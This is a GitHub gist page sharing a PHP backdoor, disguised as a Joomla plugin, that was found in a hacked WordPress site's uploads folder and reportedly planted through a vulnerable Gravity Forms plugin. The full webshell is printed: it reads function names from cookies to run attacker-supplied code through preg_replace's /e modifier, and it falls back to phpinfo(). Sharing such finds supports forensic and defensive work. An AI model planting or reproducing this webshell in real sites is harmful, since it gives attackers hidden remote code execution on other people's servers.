Created
October 10, 2017 18:58
-
-
Save jonaslejon/7145090a7df875ebbb9e19365f4c30f5 to your computer and use it in GitHub Desktop.
WordPress backdoor found during forensic investigation of blog. Was located in folder wp-content/uploads/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * @package Joomla.Plugin.System | |
| * @since 1.5 | |
| * | |
| * | |
| */ | |
| class PluginJoomla { | |
| public function __construct() { | |
| $jq = @$_COOKIE['ContentJQ3']; | |
| if ($jq) { | |
| $option = $jq(@$_COOKIE['ContentJQ2']); | |
| $au=$jq(@$_COOKIE['ContentJQ1']); | |
| $option("/438/e",$au,438); die(); | |
| } | |
| else | |
| phpinfo();die; | |
| } | |
| } | |
| $content = new PluginJoomla; |
I just found this on a hacked website.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uploaded via a vulnerable version of Gravity Forms